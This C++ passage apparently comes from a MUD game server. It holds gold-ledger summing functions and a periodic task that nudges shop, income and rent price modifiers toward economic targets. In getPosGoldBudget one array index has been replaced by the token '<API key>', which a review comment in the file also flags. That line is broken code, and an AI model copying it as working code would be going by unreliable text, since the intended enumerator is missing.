      gold_statistics[GOLD_SHOP_RESPONSES][i] +
      gold_statistics[GOLD_SHOP][i];
  return net_gold;
}
// getPosGoldBudget - gross (positive-only) gold flow over the same
// "on-budget" categories as getNetGoldBudget() (rent and pet-shop
// excluded), summed over all mortal levels.
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator.
unsigned int getPosGoldBudget()
{
  unsigned int pos_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    pos_gold += gold_positive[GOLD_INCOME][i] +
      gold_positive[GOLD_COMM][i] +
      gold_positive[GOLD_REPAIR][i] +
      gold_positive[GOLD_HOSPITAL][i] +
      gold_positive[GOLD_GAMBLE][i] +
      gold_positive[GOLD_DUMP][i] +
      gold_positive[GOLD_TITHE][i] +
      gold_positive[GOLD_SHOP_FOOD][i] +
      gold_positive[<API key>][i] +
      gold_positive[GOLD_SHOP_SYMBOL][i] +
      gold_positive[GOLD_SHOP_ARMOR][i] +
      gold_positive[GOLD_SHOP_WEAPON][i] +
      gold_positive[GOLD_SHOP_RESPONSES][i] +
      gold_positive[GOLD_SHOP][i];
  return pos_gold;
}
// procCheckGoldStats - periodic task that audits the gold ledgers and
// rebalances the economy modifiers (see procCheckGoldStats::run).
// p is the pulse interval at which the scheduler triggers the task.
procCheckGoldStats::procCheckGoldStats(const int &p)
{
  name = "procCheckGoldStats";
  trigger_pulse = p;
}
// procCheckGoldStats::run - automatic economy balancer.
// Reads the accumulated gold ledgers and nudges three price modifiers
// by 0.01 per run toward their targets:
//   - GOLD_SHOP:   shops should net roughly -5% of shop gross (a drain)
//   - GOLD_INCOME: players overall should gain ~2% of on-budget gross
//   - GOLD_RENT:   rent should account for ~10% of the total drain
// Whenever any modifier is adjusted, both ledgers are zeroed and saved
// so the next reading starts from a clean sample.
void procCheckGoldStats::run(const TPulse &) const
{
  // insure we have enough data to take accurate reading
  unsigned int pos_gold = getPosGoldGlobal();
  if (pos_gold < 5000000U)
//  if (pos_gold < 2000000U)
    return;

  int net_gold = getNetGoldGlobal();
  int net_gold_all_shops = getNetGoldShops();
  int net_gold_budget = getNetGoldBudget();
  unsigned int pos_gold_all_shops = getPosGoldShops();
  unsigned int pos_gold_budget = getPosGoldBudget();
  bool should_reset = false;

  // want shops to make money (roughly 5% of total)
  if (net_gold_all_shops > 0) {
    // shops are giving out too much money
    gold_modifier[GOLD_SHOP] -= 0.01;
//    vlogf(LOG_BUG, format("ECONOMY: shop modifier lowered.  %d %u %.2f") % net_gold_all_shops % pos_gold_all_shops % gold_modifier[GOLD_SHOP].getVal());
    should_reset = true;
  } else if ((unsigned int) -net_gold_all_shops > pos_gold_all_shops/10) {
    // shops are making too much money
    // (the cast is safe here: this branch only runs when
    // net_gold_all_shops <= 0, so -net_gold_all_shops >= 0)
    gold_modifier[GOLD_SHOP] += 0.01;
//    vlogf(LOG_BUG, format("ECONOMY: shop modifier raised.  %d %u %.2f") % net_gold_all_shops % pos_gold_all_shops % gold_modifier[GOLD_SHOP].getVal());
    should_reset = true;
  }

  // overall, would like players to be gaining slightly on gold (2% target)
  float target_income = 0.02;
  // BUG FIX: net_gold_budget may legitimately be negative (players
  // losing money).  The old code cast it to unsigned int before the
  // floating-point comparison, so a negative budget wrapped to a huge
  // positive value: the "losing money" branch could never fire and the
  // "making too much" branch fired instead, lowering income exactly
  // when it should have been raised.  Compare as double instead.
  if ((double) net_gold_budget < ((target_income - 0.03) * pos_gold_budget)) {
    // players losing money
    gold_modifier[GOLD_INCOME] += 0.01;
//    vlogf(LOG_BUG, format("ECONOMY: income modifier raised.  %d %u %.2f") %  net_gold_budget % pos_gold_budget % gold_modifier[GOLD_INCOME].getVal());
    should_reset = true;
  } else if ((double) net_gold_budget > ((target_income + 0.03) * pos_gold_budget)) {
    // players making too much
    gold_modifier[GOLD_INCOME] -= 0.01;
//    vlogf(LOG_BUG, format("ECONOMY: income modifier lowered.  %d %u %.2f") % net_gold_budget % pos_gold_budget % gold_modifier[GOLD_INCOME].getVal());
    should_reset = true;
  }

  // good drain:
  //   components and symbol purchasing
  //   armor and weapon purchasing (upgrading)
  //   purchases from response mobs (in general, components)
  //   money spent repairing eq
  //   food purchases
  //   income money : unrecovered corpse?
  // rent costs are really off budget
  // we definitely do not want rent to be significant part of economy
  float target_rent = 0.10;
  // get the drain associated with renting
  int rent_drain = getPosGold(GOLD_RENT) - getNetGold(GOLD_RENT);
  // realize that we are flucuating these costs based on these costs
  // which is rather problematic
  // we essentially want the "true" rent drain
  int adj_rent = (int) (rent_drain / gold_modifier[GOLD_RENT].getVal());
  int total_drain = pos_gold - net_gold;
  if (adj_rent < (int) ((target_rent - .05) * total_drain)) {
    // rent is too small a drain
    // reduce the cost of renting so that folks will be able to rent more
    gold_modifier[GOLD_RENT] -= 0.01;
    should_reset = true;
  } else if (adj_rent > (int) ((target_rent + .05) * total_drain)) {
    // rent is too large a drain
    // raise the cost of renting so that folks will be able to rent less
    gold_modifier[GOLD_RENT] += 0.01;
    should_reset = true;
  }

#if 0
  // desire money from eq be no more than 25% of total
  // that is, most money comes from raw loads on mobs (commods, gold, etc)
  const double target_eq = 0.25;
  unsigned int pos_gold_shop_arm = getPosGold(GOLD_SHOP_ARMOR);
  unsigned int pos_gold_shop_weap = getPosGold(GOLD_SHOP_WEAPON);
  double eq_factor = (double) (pos_gold_shop_arm + pos_gold_shop_weap) /
                     pos_gold;
  if (eq_factor < (target_eq - 0.05)) {
    // too little money from EQ
    stats.equip += 0.01;
    should_reset = true;
  } else if (eq_factor > (target_eq + 0.05)) {
    // too much money from EQ
    stats.equip -= 0.01;
    should_reset = true;
  }
#endif

  // start a fresh sampling window after any adjustment
  if (should_reset) {
    memset(&gold_statistics, 0, sizeof(gold_statistics));
    memset(&gold_positive, 0, sizeof(gold_positive));
    save_game_stats();
  }
}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.